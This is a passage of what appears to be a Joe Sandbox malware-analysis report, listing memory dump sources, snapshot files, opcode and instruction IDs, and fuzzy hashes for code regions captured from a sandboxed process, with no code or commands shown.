                                                                                                                                  • Opcode Fuzzy Hash: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
                                                                                                                                  • Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b4f6a14d0918c00685bedf2c69b5833efcd0c8eaf6aed19e34774882e70e33d0
                                                                                                                                  • Instruction ID: 26cdf523e6d73df81e7477b47efd8c02aacce24fd13f72a27aa2ad77ed72bb3b
                                                                                                                                  • Opcode Fuzzy Hash: b4f6a14d0918c00685bedf2c69b5833efcd0c8eaf6aed19e34774882e70e33d0
                                                                                                                                  • Instruction Fuzzy Hash: 01D01235E2122786CB01EBB1AD410EEB334AE95221B588626D52936150EB30665986D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 40eb162ad628d66099252c71cad0f7b5767f52108614e1a63fe7ac124d661043
                                                                                                                                  • Instruction ID: 2fb1769cc0d7c649529f04d67eba65e8939d60929893032326d3b31a286de70f
                                                                                                                                  • Opcode Fuzzy Hash: 40eb162ad628d66099252c71cad0f7b5767f52108614e1a63fe7ac124d661043
                                                                                                                                  • Instruction Fuzzy Hash: 67D04235E0410DCBCF30DFA9E4894DDBB71EB49325B10946AD929A3651D63054558F51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0a7e90c79ff34da66eaeae6c002b1c9f3470219d6edd77efc12aa6507ecd116
                                                                                                                                  • Instruction ID: d918a14b330bb4828339b8b35cf6fa33da131cc93bdf804cb49304c052accf7b
                                                                                                                                  • Opcode Fuzzy Hash: d0a7e90c79ff34da66eaeae6c002b1c9f3470219d6edd77efc12aa6507ecd116
                                                                                                                                  • Instruction Fuzzy Hash: 5ED0673BB00008DFCB149F99E8809DDF776FB98261B04C116F925A3264C6319965DB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f47ee988ac3e657eb5c7d49c41ad027ed6b2e835bc072a20251e0d3ec13d3596
                                                                                                                                  • Instruction ID: 7cd3f85b548ea9f5cb077e8b03db59b38ea0afbc6a9d0d3000ca4753e2e8d278
                                                                                                                                  • Opcode Fuzzy Hash: f47ee988ac3e657eb5c7d49c41ad027ed6b2e835bc072a20251e0d3ec13d3596
                                                                                                                                  • Instruction Fuzzy Hash: 5EC0123040430B8ED515F766ED44555772EE6E0204740C51491054A689DE7D5DDB4794
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 917750c642fe896f8b983f82ba61ae7f139c26a90a2f7be080f13dfd379bea90
                                                                                                                                  • Instruction ID: 08ff2912de3aca161a6a6b1da5e662fd799bd379f880d9d30a783cce9961c431
                                                                                                                                  • Opcode Fuzzy Hash: 917750c642fe896f8b983f82ba61ae7f139c26a90a2f7be080f13dfd379bea90
                                                                                                                                  • Instruction Fuzzy Hash: EB529A74E01269CFDB64DF69C884B9EBBB2BF89305F1081E9D409A7264DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90f8598c20d2d1fa7b5d956d9c2121238c88e0aea01c35ee35ad23bb771ee314
                                                                                                                                  • Instruction ID: 29ed473698ad2fdcb222d7d9bc5d699a9b2088609be421c3d7290b9bc1fd6501
                                                                                                                                  • Opcode Fuzzy Hash: 90f8598c20d2d1fa7b5d956d9c2121238c88e0aea01c35ee35ad23bb771ee314
                                                                                                                                  • Instruction Fuzzy Hash: 6BC1AE74E01259CFDB64DFA5C984B9DBBB2BF89300F1080A9D809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8866fd18f8f6f2409c12c85ff20460ad8d8d74dfdd4d4d5db8b244770c3ac0e6
                                                                                                                                  • Instruction ID: b4752fe0b915c6435a9779132a1fcb82eac6d35f1aa538a03301a436fadd46c8
                                                                                                                                  • Opcode Fuzzy Hash: 8866fd18f8f6f2409c12c85ff20460ad8d8d74dfdd4d4d5db8b244770c3ac0e6
                                                                                                                                  • Instruction Fuzzy Hash: 69C18D74E01259CFDB54DFA5C984B9DBBB2BF89300F1081AAD809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc124e552e4d0507aa204d4c09e59f76e5bfd280c38911feaa9e02591a31d104
                                                                                                                                  • Instruction ID: f5789de7f1cc675cdf667b6a098362d5aa0c7061bbce77fec70ee83c7fa52c2d
                                                                                                                                  • Opcode Fuzzy Hash: cc124e552e4d0507aa204d4c09e59f76e5bfd280c38911feaa9e02591a31d104
                                                                                                                                  • Instruction Fuzzy Hash: D6C1BE78E01259CFDB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68f7153c772007e51830a13b01d81437c0b2f6b68df2580080f8df9db45de64d
                                                                                                                                  • Instruction ID: 298532c309bab5a19002ed067e9ee02f09f08944fd6c0ea9d82ba16ff69786ac
                                                                                                                                  • Opcode Fuzzy Hash: 68f7153c772007e51830a13b01d81437c0b2f6b68df2580080f8df9db45de64d
                                                                                                                                  • Instruction Fuzzy Hash: 7EC19E74E01259CFDB54DFA5C984B9DBBB2BF89300F1081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb4ece6f1a93ff82fe3220364f8f95a152e125b15128bb72f088fea69e49dfac
                                                                                                                                  • Instruction ID: a826ca053a39be4f52b4169b3a13136d91e49af46ed298381d76e4e0ba0233b2
                                                                                                                                  • Opcode Fuzzy Hash: cb4ece6f1a93ff82fe3220364f8f95a152e125b15128bb72f088fea69e49dfac
                                                                                                                                  • Instruction Fuzzy Hash: 78C19E74E01259CFDB64DFA5C944B9DBBB2BF89300F1081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0c3f65f853a9ed85399884cfa02cdf1d287a8e22dc6d8ee3a0bacdeab23cea87
                                                                                                                                  • Instruction ID: 17dc1be00b635a434fc4836dbbbd20f276ac3e084d67ecdffb53e4bf838e6445
                                                                                                                                  • Opcode Fuzzy Hash: 0c3f65f853a9ed85399884cfa02cdf1d287a8e22dc6d8ee3a0bacdeab23cea87
                                                                                                                                  • Instruction Fuzzy Hash: EAC1AD74E01259CFDB54DFA5D984B9DBBB2BF89300F2080AAD809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a6463cafdf226f9f1d413b59d3d281624db3a67a86d6079cae8deeaa7969a4a7
                                                                                                                                  • Instruction ID: 6923fe5791e6e9e71a6a6343ce99c0bffea63897d6b65d49ac712d31b6404904
                                                                                                                                  • Opcode Fuzzy Hash: a6463cafdf226f9f1d413b59d3d281624db3a67a86d6079cae8deeaa7969a4a7
                                                                                                                                  • Instruction Fuzzy Hash: 5DC19E78E01259CFDB24DFA5C944B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9824db90d739afee713a65c89ebccdb244855e6ee5c1c1e0e872a73ea1287363
                                                                                                                                  • Instruction ID: c83386cca8119e8717c4567a12fdfe769a7560b4b3b236999e3b0461c5371076
                                                                                                                                  • Opcode Fuzzy Hash: 9824db90d739afee713a65c89ebccdb244855e6ee5c1c1e0e872a73ea1287363
                                                                                                                                  • Instruction Fuzzy Hash: 38C19D74E01259CFDB14DFA5D984B9DBBB2BF89300F2080AAD809AB355DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb140b433a868a3ef4b9b6a0bafc841962149169adb462ceb636077bfdb01585
                                                                                                                                  • Instruction ID: 4696fc8d8af76f5abc57133e61152805183c392523c9ab9c1cde14dc44ef7846
                                                                                                                                  • Opcode Fuzzy Hash: cb140b433a868a3ef4b9b6a0bafc841962149169adb462ceb636077bfdb01585
                                                                                                                                  • Instruction Fuzzy Hash: 6FC19E78E01259CFDB54DFA5C984B9DBBB2BF89300F2081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ca181e353be3583a7614b01fe36f1828ce23dad28c740811789b4ef9d17c2281
                                                                                                                                  • Instruction ID: dac786c03a2529f57956ed0ca2ed34441ec2c52e0b2696f9154cfe3fc7c5d727
                                                                                                                                  • Opcode Fuzzy Hash: ca181e353be3583a7614b01fe36f1828ce23dad28c740811789b4ef9d17c2281
                                                                                                                                  • Instruction Fuzzy Hash: FDC18E78E01259CFDB54DFA5C984B9DBBB2BF89300F1081AAD809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b1134b9d8cd93c9f9420bf4c9ecdc3584995a4dc3752e7f2f80de866069ae5fb
                                                                                                                                  • Instruction ID: 281cce370c8ab256e1eb82465def52f5da428fb97333b9a9c3242a34accf2cf4
                                                                                                                                  • Opcode Fuzzy Hash: b1134b9d8cd93c9f9420bf4c9ecdc3584995a4dc3752e7f2f80de866069ae5fb
                                                                                                                                  • Instruction Fuzzy Hash: D2C19E78E01259CFDB14DFA5C984B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 08952dc34c93879aa1339a24694e05af091b79e1c9298f701fde59a1e5558dea
                                                                                                                                  • Instruction ID: 2398fdba489def781abd8392c3d72091fe46057cec8fa29b24a8c2318ac2a11f
                                                                                                                                  • Opcode Fuzzy Hash: 08952dc34c93879aa1339a24694e05af091b79e1c9298f701fde59a1e5558dea
                                                                                                                                  • Instruction Fuzzy Hash: 64A1AC74A01268CFDB64DF24C984B9ABBB2BF89304F1085E9D40EA7254DB319EC1CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a448a81cf8d181d66897edc6b08dee7e9a641d96b11a050c5e16d4bc6830deb7
                                                                                                                                  • Instruction ID: 7b9f737e9d5ce6660f48fe84ce7b60968b888d432c3206597a1200da8f50ac3e
                                                                                                                                  • Opcode Fuzzy Hash: a448a81cf8d181d66897edc6b08dee7e9a641d96b11a050c5e16d4bc6830deb7
                                                                                                                                  • Instruction Fuzzy Hash: 51512670D01209DBEF14EFA9D5847EDBBB6FB89308F14D129D404BB294DB799881CB54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d514016c81021b5ffd1e92c3f16fcbc9e02be507758150d50bad2949c821350f
                                                                                                                                  • Instruction ID: c4f15033a873f89d52dc85515a6d13e889757920a8fc5a51c4117cbe93a1000c
                                                                                                                                  • Opcode Fuzzy Hash: d514016c81021b5ffd1e92c3f16fcbc9e02be507758150d50bad2949c821350f
                                                                                                                                  • Instruction Fuzzy Hash: F0510070D01209DBEF10EFA9D584BEDBBBAFB49318F249169D419BB294C7399881CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36248c9e29a47b1c1b89fbdee2d7df0abbc6bd3bf67040bad226c8c8ea2a6b7f
                                                                                                                                  • Instruction ID: e67d81f9ccae8e08cb194748e77a996fc4d0fb6fa8179ea0e39db2df458cefb8
                                                                                                                                  • Opcode Fuzzy Hash: 36248c9e29a47b1c1b89fbdee2d7df0abbc6bd3bf67040bad226c8c8ea2a6b7f
                                                                                                                                  • Instruction Fuzzy Hash: 3B519E74A01229CFCB65DF24C994BAAB7B2FB4A305F5085E9D40AA7354CB329E81CF50